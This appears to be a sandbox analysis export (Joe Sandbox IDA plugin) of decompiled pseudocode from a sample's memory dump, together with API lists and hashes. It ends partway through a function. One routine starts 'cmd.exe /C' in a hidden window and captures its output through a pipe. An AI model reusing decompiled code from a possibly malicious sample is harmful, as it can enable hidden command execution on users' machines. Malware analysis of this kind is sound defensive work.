                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9222DD34A00109DFDB04EFA5C585A9DB7F1FF49304F2088AAE915AB365CB34EE06CB59
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                                                                                            			E0045695C(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				intOrPtr* _v8;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				intOrPtr _t149;
                                                                                                                                                                                                                            				intOrPtr _t154;
                                                                                                                                                                                                                            				intOrPtr _t155;
                                                                                                                                                                                                                            				intOrPtr _t160;
                                                                                                                                                                                                                            				intOrPtr _t162;
                                                                                                                                                                                                                            				intOrPtr _t163;
                                                                                                                                                                                                                            				void* _t165;
                                                                                                                                                                                                                            				struct HWND__* _t166;
                                                                                                                                                                                                                            				long _t176;
                                                                                                                                                                                                                            				signed int _t198;
                                                                                                                                                                                                                            				signed int _t199;
                                                                                                                                                                                                                            				long _t220;
                                                                                                                                                                                                                            				intOrPtr _t226;
                                                                                                                                                                                                                            				int _t231;
                                                                                                                                                                                                                            				intOrPtr _t232;
                                                                                                                                                                                                                            				intOrPtr _t241;
                                                                                                                                                                                                                            				intOrPtr _t245;
                                                                                                                                                                                                                            				signed int _t248;
                                                                                                                                                                                                                            				intOrPtr _t251;
                                                                                                                                                                                                                            				intOrPtr _t252;
                                                                                                                                                                                                                            				signed int _t258;
                                                                                                                                                                                                                            				long _t259;
                                                                                                                                                                                                                            				intOrPtr _t262;
                                                                                                                                                                                                                            				intOrPtr _t266;
                                                                                                                                                                                                                            				signed int _t269;
                                                                                                                                                                                                                            				intOrPtr _t270;
                                                                                                                                                                                                                            				intOrPtr _t271;
                                                                                                                                                                                                                            				signed int _t277;
                                                                                                                                                                                                                            				long _t278;
                                                                                                                                                                                                                            				intOrPtr _t281;
                                                                                                                                                                                                                            				signed int _t286;
                                                                                                                                                                                                                            				signed int _t287;
                                                                                                                                                                                                                            				long _t290;
                                                                                                                                                                                                                            				intOrPtr _t294;
                                                                                                                                                                                                                            				struct HWND__* _t299;
                                                                                                                                                                                                                            				signed int _t301;
                                                                                                                                                                                                                            				signed int _t302;
                                                                                                                                                                                                                            				signed int _t305;
                                                                                                                                                                                                                            				signed int _t307;
                                                                                                                                                                                                                            				long _t308;
                                                                                                                                                                                                                            				signed int _t311;
                                                                                                                                                                                                                            				signed int _t313;
                                                                                                                                                                                                                            				long _t314;
                                                                                                                                                                                                                            				signed int _t317;
                                                                                                                                                                                                                            				signed int _t318;
                                                                                                                                                                                                                            				signed int _t326;
                                                                                                                                                                                                                            				long _t328;
                                                                                                                                                                                                                            				intOrPtr _t331;
                                                                                                                                                                                                                            				intOrPtr _t362;
                                                                                                                                                                                                                            				long _t370;
                                                                                                                                                                                                                            				void* _t372;
                                                                                                                                                                                                                            				void* _t373;
                                                                                                                                                                                                                            				intOrPtr _t374;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t372 = _t373;
                                                                                                                                                                                                                            				_t374 = _t373 + 0xfffffff8;
                                                                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				_push(_t372);
                                                                                                                                                                                                                            				_push(0x456ec6);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t374;
                                                                                                                                                                                                                            				if(( *(_v8 + 0x1c) & 0x00000010) == 0 && ( *(_v8 + 0x2f4) & 0x00000004) != 0) {
                                                                                                                                                                                                                            					_t294 =  *0x49de28; // 0x422f40
                                                                                                                                                                                                                            					E00406A70(_t294,  &_v12);
                                                                                                                                                                                                                            					E0040D144(_v12, 1);
                                                                                                                                                                                                                            					E00404378();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t149 =  *0x49ebb8; // 0x0
                                                                                                                                                                                                                            				E0045B100(_t149);
                                                                                                                                                                                                                            				 *(_v8 + 0x2f4) =  *(_v8 + 0x2f4) | 0x00000004;
                                                                                                                                                                                                                            				_push(_t372);
                                                                                                                                                                                                                            				_push(0x456ea9);
                                                                                                                                                                                                                            				_push( *[fs:edx]);
                                                                                                                                                                                                                            				 *[fs:edx] = _t374;
                                                                                                                                                                                                                            				if(( *(_v8 + 0x1c) & 0x00000010) == 0) {
                                                                                                                                                                                                                            					_t155 = _v8;
                                                                                                                                                                                                                            					_t378 =  *((char*)(_t155 + 0x1a6));
                                                                                                                                                                                                                            					if( *((char*)(_t155 + 0x1a6)) == 0) {
                                                                                                                                                                                                                            						_push(_t372);
                                                                                                                                                                                                                            						_push(0x456db0);
                                                                                                                                                                                                                            						_push( *[fs:eax]);
                                                                                                                                                                                                                            						 *[fs:eax] = _t374;
                                                                                                                                                                                                                            						E00403DE8(_v8, __eflags);
                                                                                                                                                                                                                            						 *[fs:eax] = 0;
                                                                                                                                                                                                                            						_t160 =  *0x49ebbc; // 0x0
                                                                                                                                                                                                                            						__eflags =  *((intOrPtr*)(_t160 + 0x6c)) - _v8;
                                                                                                                                                                                                                            						if( *((intOrPtr*)(_t160 + 0x6c)) == _v8) {
                                                                                                                                                                                                                            							__eflags = 0;
                                                                                                                                                                                                                            							E00455B08(_v8, 0);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t162 = _v8;
                                                                                                                                                                                                                            						__eflags =  *((char*)(_t162 + 0x22f)) - 1;
                                                                                                                                                                                                                            						if( *((char*)(_t162 + 0x22f)) != 1) {
                                                                                                                                                                                                                            							_t163 = _v8;
                                                                                                                                                                                                                            							__eflags =  *(_t163 + 0x2f4) & 0x00000008;
                                                                                                                                                                                                                            							if(( *(_t163 + 0x2f4) & 0x00000008) == 0) {
                                                                                                                                                                                                                            								_t299 = 0;
                                                                                                                                                                                                                            								_t165 = E00441704(_v8);
                                                                                                                                                                                                                            								_t166 = GetActiveWindow();
                                                                                                                                                                                                                            								__eflags = _t165 - _t166;
                                                                                                                                                                                                                            								if(_t165 == _t166) {
                                                                                                                                                                                                                            									_t176 = IsIconic(E00441704(_v8));
                                                                                                                                                                                                                            									__eflags = _t176;
                                                                                                                                                                                                                            									if(_t176 == 0) {
                                                                                                                                                                                                                            										_t299 = E00451750(E00441704(_v8));
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								__eflags = _t299;
                                                                                                                                                                                                                            								if(_t299 == 0) {
                                                                                                                                                                                                                            									ShowWindow(E00441704(_v8), 0);
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									SetWindowPos(E00441704(_v8), 0, 0, 0, 0, 0, 0x97);
                                                                                                                                                                                                                            									SetActiveWindow(_t299);
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								SetWindowPos(E00441704(_v8), 0, 0, 0, 0, 0, 0x97);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							E0043EC5C(_v8);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_push(_t372);
                                                                                                                                                                                                                            						_push(0x456a14);
                                                                                                                                                                                                                            						_push( *[fs:eax]);
                                                                                                                                                                                                                            						 *[fs:eax] = _t374;
                                                                                                                                                                                                                            						E00403DE8(_v8, _t378);
                                                                                                                                                                                                                            						 *[fs:eax] = 0;
                                                                                                                                                                                                                            						if( *((char*)(_v8 + 0x230)) == 4 ||  *((char*)(_v8 + 0x230)) == 6 &&  *((char*)(_v8 + 0x22f)) == 1) {
                                                                                                                                                                                                                            							if( *((char*)(_v8 + 0x22f)) != 1) {
                                                                                                                                                                                                                            								_t301 = E004581F4() -  *(_v8 + 0x48);
                                                                                                                                                                                                                            								__eflags = _t301;
                                                                                                                                                                                                                            								_t302 = _t301 >> 1;
                                                                                                                                                                                                                            								if(_t301 < 0) {
                                                                                                                                                                                                                            									asm("adc ebx, 0x0");
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_t198 = E004581E8() -  *(_v8 + 0x4c);
                                                                                                                                                                                                                            								__eflags = _t198;
                                                                                                                                                                                                                            								_t199 = _t198 >> 1;
                                                                                                                                                                                                                            								if(_t198 < 0) {
                                                                                                                                                                                                                            									asm("adc eax, 0x0");
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_t241 =  *0x49ebb8; // 0x0
                                                                                                                                                                                                                            								_t305 = E0043A980( *((intOrPtr*)(_t241 + 0x44))) -  *(_v8 + 0x48);
                                                                                                                                                                                                                            								_t302 = _t305 >> 1;
                                                                                                                                                                                                                            								if(_t305 < 0) {
                                                                                                                                                                                                                            									asm("adc ebx, 0x0");
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_t245 =  *0x49ebb8; // 0x0
                                                                                                                                                                                                                            								_t248 = E0043A9C4( *((intOrPtr*)(_t245 + 0x44))) -  *(_v8 + 0x4c);
                                                                                                                                                                                                                            								_t199 = _t248 >> 1;
                                                                                                                                                                                                                            								if(_t248 < 0) {
                                                                                                                                                                                                                            									asm("adc eax, 0x0");
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							if(_t302 < 0) {
                                                                                                                                                                                                                            								_t302 = 0;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							if(_t199 < 0) {
                                                                                                                                                                                                                            								_t199 = 0;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t326 = _t199;
                                                                                                                                                                                                                            							 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
                                                                                                                                                                                                                            							if( *((char*)(_v8 + 0x57)) != 0) {
                                                                                                                                                                                                                            								E00454DB8(_v8, _t326);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_t251 =  *((intOrPtr*)(_v8 + 0x230));
                                                                                                                                                                                                                            							__eflags = _t251 + 0xfa - 2;
                                                                                                                                                                                                                            							if(_t251 + 0xfa - 2 >= 0) {
                                                                                                                                                                                                                            								__eflags = _t251 - 5;
                                                                                                                                                                                                                            								if(_t251 == 5) {
                                                                                                                                                                                                                            									_t252 = _v8;
                                                                                                                                                                                                                            									__eflags =  *((char*)(_t252 + 0x22f)) - 1;
                                                                                                                                                                                                                            									if( *((char*)(_t252 + 0x22f)) != 1) {
                                                                                                                                                                                                                            										_t307 = E00458224() -  *(_v8 + 0x48);
                                                                                                                                                                                                                            										__eflags = _t307;
                                                                                                                                                                                                                            										_t308 = _t307 >> 1;
                                                                                                                                                                                                                            										if(_t307 < 0) {
                                                                                                                                                                                                                            											asm("adc ebx, 0x0");
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            										_t258 = E00458218() -  *(_v8 + 0x4c);
                                                                                                                                                                                                                            										__eflags = _t258;
                                                                                                                                                                                                                            										_t259 = _t258 >> 1;
                                                                                                                                                                                                                            										if(_t258 < 0) {
                                                                                                                                                                                                                            											asm("adc eax, 0x0");
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                            										_t262 =  *0x49ebb8; // 0x0
                                                                                                                                                                                                                            										_t311 = E0043A980( *((intOrPtr*)(_t262 + 0x44))) -  *(_v8 + 0x48);
                                                                                                                                                                                                                            										__eflags = _t311;
                                                                                                                                                                                                                            										_t308 = _t311 >> 1;
                                                                                                                                                                                                                            										if(_t311 < 0) {
                                                                                                                                                                                                                            											asm("adc ebx, 0x0");
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            										_t266 =  *0x49ebb8; // 0x0
                                                                                                                                                                                                                            										_t269 = E0043A9C4( *((intOrPtr*)(_t266 + 0x44))) -  *(_v8 + 0x4c);
                                                                                                                                                                                                                            										__eflags = _t269;
                                                                                                                                                                                                                            										_t259 = _t269 >> 1;
                                                                                                                                                                                                                            										if(_t269 < 0) {
                                                                                                                                                                                                                            											asm("adc eax, 0x0");
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									__eflags = _t308;
                                                                                                                                                                                                                            									if(_t308 < 0) {
                                                                                                                                                                                                                            										_t308 = 0;
                                                                                                                                                                                                                            										__eflags = 0;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									__eflags = _t259;
                                                                                                                                                                                                                            									if(_t259 < 0) {
                                                                                                                                                                                                                            										_t259 = 0;
                                                                                                                                                                                                                            										__eflags = 0;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_t270 =  *0x49ebb8; // 0x0
                                                                                                                                                                                                                            								_t370 =  *(_t270 + 0x44);
                                                                                                                                                                                                                            								_t271 = _v8;
                                                                                                                                                                                                                            								__eflags =  *((char*)(_t271 + 0x230)) - 7;
                                                                                                                                                                                                                            								if( *((char*)(_t271 + 0x230)) == 7) {
                                                                                                                                                                                                                            									_t362 =  *0x44ff0c; // 0x44ff58
                                                                                                                                                                                                                            									_t290 = E00403D78( *(_v8 + 4), _t362);
                                                                                                                                                                                                                            									__eflags = _t290;
                                                                                                                                                                                                                            									if(_t290 != 0) {
                                                                                                                                                                                                                            										_t370 =  *(_v8 + 4);
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								__eflags = _t370;
                                                                                                                                                                                                                            								if(_t370 == 0) {
                                                                                                                                                                                                                            									_t313 = E004581F4() -  *(_v8 + 0x48);
                                                                                                                                                                                                                            									__eflags = _t313;
                                                                                                                                                                                                                            									_t314 = _t313 >> 1;
                                                                                                                                                                                                                            									if(_t313 < 0) {
                                                                                                                                                                                                                            										asm("adc ebx, 0x0");
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									_t277 = E004581E8() -  *(_v8 + 0x4c);
                                                                                                                                                                                                                            									__eflags = _t277;
                                                                                                                                                                                                                            									_t278 = _t277 >> 1;
                                                                                                                                                                                                                            									if(_t277 < 0) {
                                                                                                                                                                                                                            										asm("adc eax, 0x0");
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									_t317 =  *((intOrPtr*)(_t370 + 0x48)) -  *(_v8 + 0x48);
                                                                                                                                                                                                                            									__eflags = _t317;
                                                                                                                                                                                                                            									_t318 = _t317 >> 1;
                                                                                                                                                                                                                            									if(_t317 < 0) {
                                                                                                                                                                                                                            										asm("adc ebx, 0x0");
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									_t314 = _t318 +  *((intOrPtr*)(_t370 + 0x40));
                                                                                                                                                                                                                            									_t286 =  *((intOrPtr*)(_t370 + 0x4c)) -  *(_v8 + 0x4c);
                                                                                                                                                                                                                            									__eflags = _t286;
                                                                                                                                                                                                                            									_t287 = _t286 >> 1;
                                                                                                                                                                                                                            									if(_t286 < 0) {
                                                                                                                                                                                                                            										asm("adc eax, 0x0");
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									_t278 = _t287 +  *((intOrPtr*)(_t370 + 0x44));
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								__eflags = _t314;
                                                                                                                                                                                                                            								if(_t314 < 0) {
                                                                                                                                                                                                                            									_t314 = 0;
                                                                                                                                                                                                                            									__eflags = 0;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								__eflags = _t278;
                                                                                                                                                                                                                            								if(_t278 < 0) {
                                                                                                                                                                                                                            									_t278 = 0;
                                                                                                                                                                                                                            									__eflags = 0;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_t328 = _t278;
                                                                                                                                                                                                                            								 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
                                                                                                                                                                                                                            								_t281 = _v8;
                                                                                                                                                                                                                            								__eflags =  *((char*)(_t281 + 0x57));
                                                                                                                                                                                                                            								if( *((char*)(_t281 + 0x57)) != 0) {
                                                                                                                                                                                                                            									E00454DB8(_v8, _t328);
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						 *((char*)(_v8 + 0x230)) = 0;
                                                                                                                                                                                                                            						if( *((char*)(_v8 + 0x22f)) != 1) {
                                                                                                                                                                                                                            							ShowWindow(E00441704(_v8),  *(0x49bee0 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							if( *(_v8 + 0x22b) != 2) {
                                                                                                                                                                                                                            								ShowWindow(E00441704(_v8),  *(0x49bee0 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
                                                                                                                                                                                                                            								_t220 =  *(_v8 + 0x48) |  *(_v8 + 0x4c) << 0x00000010;
                                                                                                                                                                                                                            								__eflags = _t220;
                                                                                                                                                                                                                            								CallWindowProcA(0x407538, E00441704(_v8), 5, 0, _t220);
                                                                                                                                                                                                                            								E0043B1DC();
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_t231 = E00441704(_v8);
                                                                                                                                                                                                                            								_t232 =  *0x49ebb8; // 0x0
                                                                                                                                                                                                                            								SendMessageA( *( *((intOrPtr*)(_t232 + 0x44)) + 0x254), 0x223, _t231, 0);
                                                                                                                                                                                                                            								ShowWindow(E00441704(_v8), 3);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t226 =  *0x49ebb8; // 0x0
                                                                                                                                                                                                                            							SendMessageA( *( *((intOrPtr*)(_t226 + 0x44)) + 0x254), 0x234, 0, 0);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t331);
                                                                                                                                                                                                                            				 *[fs:eax] = _t331;
                                                                                                                                                                                                                            				_push(0x456eb0);
                                                                                                                                                                                                                            				_t154 = _v8;
                                                                                                                                                                                                                            				 *(_t154 + 0x2f4) =  *(_t154 + 0x2f4) & 0x000000fb;
                                                                                                                                                                                                                            				return _t154;
                                                                                                                                                                                                                            			}
                                                                                                                                                                                                                            0x00456c6a
                                                                                                                                                                                                                            0x00456c6c
                                                                                                                                                                                                                            0x00456c6c
                                                                                                                                                                                                                            0x00456c07
                                                                                                                                                                                                                            0x00456c07
                                                                                                                                                                                                                            0x00456c19
                                                                                                                                                                                                                            0x00456c19
                                                                                                                                                                                                                            0x00456c1c
                                                                                                                                                                                                                            0x00456c1e
                                                                                                                                                                                                                            0x00456c20
                                                                                                                                                                                                                            0x00456c20
                                                                                                                                                                                                                            0x00456c23
                                                                                                                                                                                                                            0x00456c33
                                                                                                                                                                                                                            0x00456c33
                                                                                                                                                                                                                            0x00456c36
                                                                                                                                                                                                                            0x00456c38
                                                                                                                                                                                                                            0x00456c3a
                                                                                                                                                                                                                            0x00456c3a
                                                                                                                                                                                                                            0x00456c38
                                                                                                                                                                                                                            0x00456c6f
                                                                                                                                                                                                                            0x00456c71
                                                                                                                                                                                                                            0x00456c73
                                                                                                                                                                                                                            0x00456c73
                                                                                                                                                                                                                            0x00456c73
                                                                                                                                                                                                                            0x00456c75
                                                                                                                                                                                                                            0x00456c77
                                                                                                                                                                                                                            0x00456c79
                                                                                                                                                                                                                            0x00456c79
                                                                                                                                                                                                                            0x00456c79
                                                                                                                                                                                                                            0x00456c92
                                                                                                                                                                                                                            0x00456c92
                                                                                                                                                                                                                            0x00456b25
                                                                                                                                                                                                                            0x00456b25
                                                                                                                                                                                                                            0x00456b2a
                                                                                                                                                                                                                            0x00456b2d
                                                                                                                                                                                                                            0x00456b30
                                                                                                                                                                                                                            0x00456b37
                                                                                                                                                                                                                            0x00456b3f
                                                                                                                                                                                                                            0x00456b45
                                                                                                                                                                                                                            0x00456b4a
                                                                                                                                                                                                                            0x00456b4c
                                                                                                                                                                                                                            0x00456b51
                                                                                                                                                                                                                            0x00456b51
                                                                                                                                                                                                                            0x00456b4c
                                                                                                                                                                                                                            0x00456b54
                                                                                                                                                                                                                            0x00456b56
                                                                                                                                                                                                                            0x00456b8f
                                                                                                                                                                                                                            0x00456b8f
                                                                                                                                                                                                                            0x00456b92
                                                                                                                                                                                                                            0x00456b94
                                                                                                                                                                                                                            0x00456b96
                                                                                                                                                                                                                            0x00456b96
                                                                                                                                                                                                                            0x00456ba6
                                                                                                                                                                                                                            0x00456ba6
                                                                                                                                                                                                                            0x00456ba9
                                                                                                                                                                                                                            0x00456bab
                                                                                                                                                                                                                            0x00456bad
                                                                                                                                                                                                                            0x00456bad
                                                                                                                                                                                                                            0x00456b58
                                                                                                                                                                                                                            0x00456b5e
                                                                                                                                                                                                                            0x00456b5e
                                                                                                                                                                                                                            0x00456b61
                                                                                                                                                                                                                            0x00456b63
                                                                                                                                                                                                                            0x00456b65
                                                                                                                                                                                                                            0x00456b65
                                                                                                                                                                                                                            0x00456b68
                                                                                                                                                                                                                            0x00456b71
                                                                                                                                                                                                                            0x00456b71
                                                                                                                                                                                                                            0x00456b74
                                                                                                                                                                                                                            0x00456b76
                                                                                                                                                                                                                            0x00456b78
                                                                                                                                                                                                                            0x00456b78
                                                                                                                                                                                                                            0x00456b7b
                                                                                                                                                                                                                            0x00456b7b
                                                                                                                                                                                                                            0x00456bb0
                                                                                                                                                                                                                            0x00456bb2
                                                                                                                                                                                                                            0x00456bb4
                                                                                                                                                                                                                            0x00456bb4
                                                                                                                                                                                                                            0x00456bb4
                                                                                                                                                                                                                            0x00456bb6
                                                                                                                                                                                                                            0x00456bb8
                                                                                                                                                                                                                            0x00456bba
                                                                                                                                                                                                                            0x00456bba
                                                                                                                                                                                                                            0x00456bba
                                                                                                                                                                                                                            0x00456bca
                                                                                                                                                                                                                            0x00456bd3
                                                                                                                                                                                                                            0x00456bd9
                                                                                                                                                                                                                            0x00456bdc
                                                                                                                                                                                                                            0x00456be0
                                                                                                                                                                                                                            0x00456be9
                                                                                                                                                                                                                            0x00456be9
                                                                                                                                                                                                                            0x00456be0
                                                                                                                                                                                                                            0x00456b1f
                                                                                                                                                                                                                            0x00456c9b
                                                                                                                                                                                                                            0x00456cac
                                                                                                                                                                                                                            0x00456d82
                                                                                                                                                                                                                            0x00456cb2
                                                                                                                                                                                                                            0x00456cbc
                                                                                                                                                                                                                            0x00456d0f
                                                                                                                                                                                                                            0x00456d23
                                                                                                                                                                                                                            0x00456d23
                                                                                                                                                                                                                            0x00456d38
                                                                                                                                                                                                                            0x00456d40
                                                                                                                                                                                                                            0x00456cbe
                                                                                                                                                                                                                            0x00456cc3
                                                                                                                                                                                                                            0x00456cce
                                                                                                                                                                                                                            0x00456cdd
                                                                                                                                                                                                                            0x00456ced
                                                                                                                                                                                                                            0x00456ced
                                                                                                                                                                                                                            0x00456d4e
                                                                                                                                                                                                                            0x00456d5d
                                                                                                                                                                                                                            0x00456d5d
                                                                                                                                                                                                                            0x00456cac
                                                                                                                                                                                                                            0x004569ea
                                                                                                                                                                                                                            0x00456e93
                                                                                                                                                                                                                            0x00456e96
                                                                                                                                                                                                                            0x00456e99
                                                                                                                                                                                                                            0x00456e9e
                                                                                                                                                                                                                            0x00456ea1
                                                                                                                                                                                                                            0x00456ea8

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SendMessageA.USER32 ref: 00456CDD
                                                                                                                                                                                                                              • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: LoadMessageSendString
                                                                                                                                                                                                                            • String ID: @/B
                                                                                                                                                                                                                            • API String ID: 1946433856-85281795
                                                                                                                                                                                                                            • Opcode ID: f732cc950298462dbf8775e8013057fa37c1ddea6ba143f1f22029aec632b822
                                                                                                                                                                                                                            • Instruction ID: 4b6bfc7c0ddb1c0560f123697eaff68a2ce520b055fb56cf76eb45ff435e8cfa
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f732cc950298462dbf8775e8013057fa37c1ddea6ba143f1f22029aec632b822
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 18F14E30A00204EFDB01DBA9C985F9E77F5AB05305F6545B6E944AB3A3D738BE44DB48
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 38%
                                                                                                                                                                                                                            			E00475384(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __esi, void* __eflags) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                            				long _v24;
                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                            				struct _SECURITY_ATTRIBUTES _v40;
                                                                                                                                                                                                                            				struct _STARTUPINFOA _v108;
                                                                                                                                                                                                                            				struct _PROCESS_INFORMATION _v124;
                                                                                                                                                                                                                            				char _v380;
                                                                                                                                                                                                                            				char _v384;
                                                                                                                                                                                                                            				char _v388;
                                                                                                                                                                                                                            				CHAR* _t77;
                                                                                                                                                                                                                            				void* _t112;
                                                                                                                                                                                                                            				intOrPtr _t125;
                                                                                                                                                                                                                            				intOrPtr _t126;
                                                                                                                                                                                                                            				void* _t131;
                                                                                                                                                                                                                            				void* _t133;
                                                                                                                                                                                                                            				void* _t134;
                                                                                                                                                                                                                            				intOrPtr _t135;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t133 = _t134;
                                                                                                                                                                                                                            				_t135 = _t134 + 0xfffffe80;
                                                                                                                                                                                                                            				_v388 = 0;
                                                                                                                                                                                                                            				_v384 = 0;
                                                                                                                                                                                                                            				_v28 = 0;
                                                                                                                                                                                                                            				_t131 = __ecx;
                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				E00404E70(_v8);
                                                                                                                                                                                                                            				E00404E70(_v12);
                                                                                                                                                                                                                            				_push(_t133);
                                                                                                                                                                                                                            				_push(0x4755bb);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t135;
                                                                                                                                                                                                                            				E004049C0(__ecx);
                                                                                                                                                                                                                            				_v40.nLength = 0xc;
                                                                                                                                                                                                                            				_v40.bInheritHandle = 0xffffffff;
                                                                                                                                                                                                                            				_v40.lpSecurityDescriptor = 0;
                                                                                                                                                                                                                            				CreatePipe( &_v16,  &_v20,  &_v40, 0);
                                                                                                                                                                                                                            				_push(_t133);
                                                                                                                                                                                                                            				_push(0x475581);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t135;
                                                                                                                                                                                                                            				E004032B4( &_v108, 0x44);
                                                                                                                                                                                                                            				_v108.cb = 0x44;
                                                                                                                                                                                                                            				_v108.dwFlags = 0x101;
                                                                                                                                                                                                                            				_v108.wShowWindow = 0;
                                                                                                                                                                                                                            				_v108.hStdInput = GetStdHandle(0xfffffff6);
                                                                                                                                                                                                                            				_v108.hStdOutput = _v20;
                                                                                                                                                                                                                            				_v108.hStdError = _v20;
                                                                                                                                                                                                                            				if(E00409A58(_v12) == 0) {
                                                                                                                                                                                                                            					E00404A58( &_v28, 0x4755d0);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					E00404A58( &_v28, _v12);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t77 = E00404E80(_v28);
                                                                                                                                                                                                                            				E00404CCC( &_v384, _v8, "cmd.exe /C ");
                                                                                                                                                                                                                            				CreateProcessA(0, E00404E80(_v384), 0, 0, 0xffffffff, 0, 0, _t77,  &_v108,  &_v124);
                                                                                                                                                                                                                            				asm("sbb ebx, ebx");
                                                                                                                                                                                                                            				_t112 = 1;
                                                                                                                                                                                                                            				CloseHandle(_v20);
                                                                                                                                                                                                                            				if(1 == 0) {
                                                                                                                                                                                                                            					_pop(_t125);
                                                                                                                                                                                                                            					 *[fs:eax] = _t125;
                                                                                                                                                                                                                            					_push(0x475588);
                                                                                                                                                                                                                            					return CloseHandle(_v16);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_push(_t133);
                                                                                                                                                                                                                            					_push(0x475563);
                                                                                                                                                                                                                            					_push( *[fs:eax]);
                                                                                                                                                                                                                            					 *[fs:eax] = _t135;
                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                            						ReadFile(_v16,  &_v380, 0xff,  &_v24, 0);
                                                                                                                                                                                                                            						asm("sbb ebx, ebx");
                                                                                                                                                                                                                            						_t112 = _t112 + 1;
                                                                                                                                                                                                                            						if(_v24 > 0) {
